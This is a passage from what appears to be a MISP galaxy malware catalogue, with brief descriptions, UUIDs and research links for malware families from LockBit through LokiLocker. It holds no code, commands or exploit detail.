- https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421 - webarchive
- https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/ - webarchive
- https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/ - webarchive
- https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79 - webarchive
- https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/ - webarchive
- https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility - webarchive
- https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/ - webarchive
- https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/ - webarchive
- https://www.washingtonpost.com/business/2024/02/20/lockbit-ransomware-cronos-nca-fbi/ - webarchive
- https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ - webarchive
- https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/ - webarchive
- https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments - webarchive
- https://resources.prodaft.com/wazawaka-report - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/ - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html - webarchive
- https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel - webarchive
- https://www.netskope.com/blog/netskope-threat-coverage-lockbit - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/ - webarchive
- https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/ - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/ - webarchive
- https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf - webarchive
- https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/ - webarchive
- https://www.s-rminform.com/cyber-intelligence-briefing/exmatter-malware-levels-up - webarchive
- https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve - webarchive
- https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.glimps.fr/lockbit3-0/ - webarchive
- https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a - webarchive
- https://securelist.com/modern-ransomware-groups-ttps/106824/ - webarchive
- https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/ - webarchive
- https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/ - webarchive
- https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354 - webarchive
- https://Page-Not-Found-404.com - webarchive
- https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html - webarchive
- https://redcanary.com/blog/intelligence-insights-november-2021/ - webarchive
- https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ - webarchive
- https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
- https://www.connectwise.com/resources/lockbit-profile - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1 - webarchive
- https://asec.ahnlab.com/en/35822/ - webarchive
- https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker - webarchive
- https://krebsonsecurity.com/2024/05/u-s-charges-russian-man-as-boss-of-lockbit-ransomware-group/ - webarchive
- https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/ - webarchive
- https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf - webarchive
- https://twitter.com/fs0c131y/status/1787852663595454807?t=xQbXF31IBgJ7c7tzTpTtlg - webarchive
- https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers - webarchive
- https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/ - webarchive
- https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/ - webarchive
- https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ - webarchive
- https://analyst1.com/ransomware-diaries-volume-1/ - webarchive
- https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets - webarchive
- https://www.intrinsec.com/alphv-ransomware-gang-analysis - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/ - webarchive
- https://unit42.paloaltonetworks.com/lockbit-2-ransomware/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt - webarchive
- https://news.sophos.com/en-us/2023/12/20/cryptoguard-an-asymmetric-approach-to-the-ransomware-battle/ - webarchive
- https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/ - webarchive
- https://blog.lexfo.fr/lockbit-malware.html - webarchive
- https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://ke-la.com/lockbit-2-0-interview-with-russian-osint/ - webarchive
- https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/ - webarchive
- https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511 - webarchive
- https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness - webarchive
- https://asec.ahnlab.com/en/41450/ - webarchive
- https://www.youtube.com/watch?v=C733AyPzkoc - webarchive
- https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/ - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/ - webarchive
- https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/ - webarchive
- https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool - webarchive
- https://blog.calif.io/p/dissecting-lockbit-v3-ransomware - webarchive
- https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/ - webarchive
- https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html - webarchive
- https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack - webarchive
- https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ - webarchive
- https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants - webarchive
- https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf - webarchive
- https://unit42.paloaltonetworks.com/emerging-ransomware-groups/ - webarchive
- https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/ - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511 - webarchive
- https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf - webarchive
- https://www.trendmicro.com/en_us/research/24/d/operation-cronos-aftermath.html - webarchive
- https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/ - webarchive
- https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions - webarchive
- https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/ - webarchive
- https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/ - webarchive
- https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://id-ransomware.blogspot.com/search?q=lockbit - webarchive
- https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085 - webarchive
- https://github.com/prodaft/malware-ioc/tree/master/PTI-257 - webarchive
- https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb - webarchive
- https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/ - webarchive
- https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/ - webarchive
- https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/ - webarchive
- https://securelist.com/crimeware-report-lockbit-switchsymb/110068/ - webarchive
- https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/LockBit_3.0/LockBit%20Technical%20Analysis%20Report.pdf - webarchive
- https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/ - webarchive
- https://github.com/EmissarySpider/ransomware-descendants - webarchive
- https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware - webarchive
- https://asec.ahnlab.com/ko/39682/ - webarchive
- https://analyst1.com/this-forum-is-a-bunch-of-communists-and-they-set-me-up-lockbit-spills-the-tea-regarding-their-recent-ban-on-russian-speaking-forums/ - webarchive
- https://analyst1.com/lockbit-takedown-operation-cronos-a-long-awaited-psyops-against-ransomware/ - webarchive
- https://twitter.com/MsftSecIntel/status/1522690116979855360 - webarchive
- https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/ - webarchive
- https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/ - webarchive
- https://security.packt.com/understanding-lockbit/ - webarchive
- https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/ - webarchive
- https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/ - webarchive
- https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LockerGoga
According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files, but certain versions had little to no whitelist that would protect important system files such as the Windows Boot Manager.
Internal MISP references
UUID a4a6469d-6753-4195-9635-f11d458525f9
which can be used as unique global reference for LockerGoga
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga - webarchive
- https://www.youtube.com/watch?v=o6eEN0mUakM - webarchive
- https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/ - webarchive
- https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/ - webarchive
- https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880 - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html - webarchive
- https://content.fireeye.com/m-trends/rpt-m-trends-2020 - webarchive
- https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202 - webarchive
- https://blog.talosintelligence.com/lockergoga/ - webarchive
- https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/ - webarchive
- https://www.abuse.io/lockergoga.txt - webarchive
- https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/ - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - webarchive
- https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot - webarchive
- https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LockFile
A ransomware first observed in July 2021.
Internal MISP references
UUID 97879260-ee50-4c7e-8d87-4bb134d1fdaf
which can be used as unique global reference for LockFile
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile - webarchive
- https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/ - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows - webarchive
- https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/ - webarchive
- https://twitter.com/VirITeXplorer/status/1428750497872232459 - webarchive
- https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html - webarchive
- https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/ - webarchive
- https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/ - webarchive
- https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Locky
Locky is a high-profile ransomware family that first appeared in early 2016 and was observed being active until the end of 2017. It encrypts files on the victim system and demands a ransom in order to get the original files back. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.
Internal MISP references
UUID 24c9bb9f-1f9a-4e01-95d8-86c51733e11c
which can be used as unique global reference for Locky
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.locky - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://vixra.org/pdf/2002.0183v1.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/ - webarchive
- https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/ - webarchive
- http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/ - webarchive
- https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/ - webarchive
- https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html - webarchive
- https://dissectingmalwa.re/picking-locky.html - webarchive
- http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/ - webarchive
- https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Locky (Decryptor)
Internal MISP references
UUID cd55cfa8-1e20-417b-9997-754b600f9f49
which can be used as unique global reference for Locky (Decryptor)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Locky Loader
For lack of a better name, this is a VBS-based loader that was used at the beginning of 2018 to deliver win.locky.
Internal MISP references
UUID 62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2
which can be used as unique global reference for Locky Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LockPOS
Internal MISP references
UUID d2c111bf-ba0d-498a-8ca8-4cc508855872
which can be used as unique global reference for LockPOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos - webarchive
- https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html - webarchive
- https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/ - webarchive
- https://www.cyberbit.com/new-lockpos-malware-injection-technique/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Loda
Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Loda.
Known Synonyms |
---|
LodaRAT |
Nymeria |
Internal MISP references
UUID 8098d303-cb5f-4eff-b62e-96bb5ef4329f
which can be used as unique global reference for Loda
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.loda - webarchive
- https://blog.talosintelligence.com/get-a-loda-this/ - webarchive
- https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/ - webarchive
- https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/ - webarchive
- https://blog.talosintelligence.com/attributing-yorotrooper/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware - webarchive
- https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html - webarchive
- https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/ - webarchive
- https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA - webarchive
- https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel - webarchive
- https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html - webarchive
- https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LODEINFO
Internal MISP references
UUID 9429e1b3-31fb-4e52-ad78-e3d377f10fcb
which can be used as unique global reference for LODEINFO
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lodeinfo - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_2_7_hara_shoji_higashi_vickie-su_nick-dai_en.pdf - webarchive
- https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-apt-activity-report-q2-2023-q3-2023.pdf - webarchive
- https://blogs.jpcert.or.jp/ja/2020/02/LODEINFO.html - webarchive
- https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html - webarchive
- https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/ - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://blog-en.itochuci.co.jp/entry/2024/01/24/134100 - webarchive
- https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf - webarchive
- https://twitter.com/jpcert_ac/status/1351355443730255872 - webarchive
- https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_1_6_minakawa-saika-kubokawa_en.pdf - webarchive
- https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/ - webarchive
- https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/ - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf - webarchive
- https://blogs.jpcert.or.jp/ja/2020/06/LODEINFO-2.html - webarchive
- https://blogs.jpcert.or.jp/en/2021/02/LODEINFO-3.html - webarchive
- https://www.youtube.com/watch?v=zSEySLeWrMQ - webarchive
- https://www.cyberandramen.net/2020/06/analysis-of-lodeinfo-maldoc.html - webarchive
- https://blogs.jpcert.or.jp/en/2020/02/malware-lodeinfo-targeting-japan.html - webarchive
- https://www.macnica.co.jp/business/security/security-reports/pdf/cyberespionage_report_2023.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Logedrut
Internal MISP references
UUID 70cd1eb4-0410-47c6-8817-418380240d85
which can be used as unique global reference for Logedrut
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LogPOS
Internal MISP references
UUID 2789b246-d762-4d38-8cc8-302293e314da
which can be used as unique global reference for LogPOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos - webarchive
- https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html - webarchive
- https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-11-16-logpos-new-point-of-sale-malware-using-mailslots.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Logtu
Internal MISP references
UUID eda979a7-89eb-4dcb-858d-8232e2c47d1e
which can be used as unique global reference for Logtu
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu - webarchive
- https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/ - webarchive
- https://news.drweb.ru/show/?i=14177 - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LoJax
Internal MISP references
UUID 15228ae0-26f9-44d8-8d6e-87b0bd2d2aba
which can be used as unique global reference for LoJax
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax - webarchive
- https://www.youtube.com/watch?v=VeoXT0nEcFU - webarchive
- https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf - webarchive
- https://habr.com/ru/amp/post/668154/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LokiLocker
LokiLocker is a .NET ransomware, first seen in August 2021. This malware is protected with NETGuard (a modified ConfuserEX) using the additional KoiVM virtualization plugin. The victims were observed to be scattered around the world, with the main concentration in Eastern Europe and Asia (BlackBerry).
Internal MISP references
UUID 3642aa5a-61b3-4de9-b124-8ecb8b53351d
which can be used as unique global reference for LokiLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lokilocker - webarchive
- https://www.msspalert.com/cybersecurity-research/lokilocker-ransomware-may-use-false-flag-to-avoid-identification/ - webarchive
